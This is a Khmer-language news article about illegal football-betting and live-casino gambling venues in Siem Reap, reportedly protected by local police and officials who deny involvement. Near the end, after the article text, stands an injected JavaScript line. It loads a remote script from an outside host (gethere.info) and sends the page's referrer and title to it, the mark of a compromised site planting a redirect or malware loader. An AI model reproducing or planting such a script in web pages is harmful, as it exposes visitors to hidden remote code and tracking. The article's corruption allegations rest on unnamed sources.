Leng Navatra – Sidebar Out Left
Leng Navatra – Banner Out Right

ទី​តាំ​ង​ល្បែ​ង​ភ្នា​ល់​បា​ល់​ និ​ង​ល្បែ​ង​បៀ​រ​ Live​ផ្ទា​ល់​ពី​កា​ស៊ី​ណូ​ នៅ​ក្រុ​ង​សៀ​ម​រា​ប​កំពុងរាលដាលស្របពេលដែលសមត្ថកិច្ចមិនបង្ក្រាប

ខេត្តសៀមរាប៖យោងតាមការរាយការណ៍ មួយចំនួន រួមជាមួយកាលើកឡើង របស់មហាជនទូរទៅ បានឲ្យTNN ថា ទីតាំងល្បែងភ្នាល់ចាក់បាល់ និង​ល្បែ​ង​បៀរ ឡាយផ្ទាល់ពីកាស៊ីណូ នៅក្រុងសៀមរាបនាបច្ចុប្បន្ននេះ ដែលគេសង្ស័យថាភាគច្រើន ជារបស់សមត្ថកិច្ចមួយចំនួន កំពុង​នាំគ្នាសប្បាយ ប្រមូល​លុយ​ដាក់​ហោប៉ៅ ដូច្នេះហើយទើបមិនមានការបង្ក្រាប ផ្ទុយនឹងបទបញ្ជា ឬសេចក្ដីណែនាំរបស់ថ្នាក់ដឹកនាំ ជាពិសេសប្រសាសន៍ សម្ដេចក្រឡាហោម សខេង ដែលបញ្ជាឲ្យចាត់វិធានការក្តៅ លើល្បែងស៊ីសងទាំងនោះ។ទីតាំងល្បែងភ្នាល់ចាក់បាល់ និងល្បែងបៀរ ឡាយផ្ទាល់ពីកាស៊ីណូនោះ គេឃើញមាននៅចំនួន ២សង្កាត់ នៃកក្រុងសៀមរាប គឺនៅក្នុងសង្កាត់ស្វាយដង្គុំ និ​ងស​ង្កា​​ត់​គោកចក ហើយគេដឹងថា មានទីតាំងភ្នាល់ចាក់បាល់ ចាក់បៀរ ៣ទីតាំង គឺជារបស់លោកផ្កាយ ១ ម្នាក់ផងដែរ។

ប្រភពបន្តថាមូលហេតុ ដែលល្បែងស៊ីសងទាំងនោះ ដំណើរការទៅដោយរលូន រហូតដល់បច្ចុប្បន្ននេះ ដោយសារមាន លោកអភិបាលក្រុងសៀមរាប លោក​អធិ​កា​រ​​ក្រុងសៀមរាប និងលោកមេបញ្ជារការរង អាវុធហត្ថក្តោបសេដ្ឋកិច្ច ខេត្តសៀមរាប ជាអ្នកក្តាប់រួមរាល់ល្បែងស៊ីសង នាបច្ចុប្បន្ន​នេះ និងនៅមាន​បណ្តាការិយា​ល័​យ សមត្ថកិច្ច ក៍ពាក់ព័នដែរ ។ ក្រៅពីល្បែងស៊ីសងទាំងនោះ ក៍នៅមានករណីប្រើប្រាស់ ថ្នាំញៀន នៅនឹងទីតាំងល្បែង នោះផងដែរ និងនៅទីតាំងទទួលបញ្ចាំ   ដែលកំពុងទទួលផលចោរកម្ម យ៉ាងពេញទំហឹងផងដែរ ទើបមិនមានសមត្ថកិច្ចណាហ៊ានបង្ក្រាប។

អ្្នកញៀននឹងល្បែងស៊ីសង ឡាយផ្ទាល់ពីកាស៊ីណូ ប្រាប់ថាពួកគាត់លេង មានពេលចាញ់៧០ ទៅ៩០ភាគរយ ឱកាសឈ្នះតិចណាស់ ដោយចូលទៅ​ចាក់បាល់​ម្នាក់ៗ ក្នុង១ថ្ងៃ ចាញ់អស់រាប់រយដុល្លា ឯណ្ណោះ។

ពាក់ព័ន្ធការចោទប្រកាន់ខាងលើ ឆ្លើយតបតាមទូរស័ព្ទ លោក ទិត្យ ណារ៉ុង អធិការក្រុងសៀមរាប ប្រាប់ថាជាប់ប្រជុំនៅស្នងការ ។ លោក ស៊ូ ប្លាតុង អភិបាល​អភិ​បា​ល​ក្រុងសៀមរាប បានតបតាមទូរស័ព្ទ នាល្ងាចទី២០ ខែធ្នូ ឆ្នាំ២០១៦ថា លោកមិនបានពាក់ព័ន្ទ រឿងលុយកាក់ទេ លោកថាអរគុណសម្រាប់ ការផ្តល់ព័ត៌មាន ​លោ​​កនិងប្រជុំ គណះបញ្ជារការក្រុង និងសុំគោលការណ៍ ខេត្តចុះស្រាវជ្រាវ និងចាត់វិធានការ លើបញ្ហាល្បែងនោះ។ ដោយឡែក លោក ហា ដាលុច មេបញ្ជារ​កា​រ​​រង កងរាជអាវុធហត្ថខេត្តសៀមរាប ទទួលផែនសេដ្ឋកិច្ច បញ្ជាក់ថា លោកមិនស្គាល់ ទីតាំងល្បែងស៊ីសងនោះទេ លោកថានិងឲ្យកម្លាំងរបស់លោក ចុះធ្វើការ ស្រា​វ​​ជ្រាវ។

គួរំលឹកថា កាលពីថ្ងៃទី១៤ ខែសីហា កន្លងទៅ ល្បែងស៊ីសងទាំងនេះ ត្រូវបានគេបិទទ្វារម្តង រួចមកហើយ ក្រោយ មកក៍ចាប់ដំណើរការវិញ ដោយ​សារមានការ ត្រូវ​រូ​វ​គ្នាជាប្រព័ន្ធ ហើយបញ្ហាខាងលើនេះ ប្រជាពលរដ្ឋ ឬមហាជនទូរទៅ រង់ចាំមើល ថាតើគ្រប់ស្ថាប័នពាក់ព័ន្ធ មានចំណាត់ការដែរឬទេ ?? បើទីតាំងល្បែងស៊ីសង  និ​ងទីតាំងទទួលបញ្ចាំ ទាំងនោះត្រូវបានប្រភពបង្ហើបថា ជារបស់អស់លោកដូច្នេះ៕

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More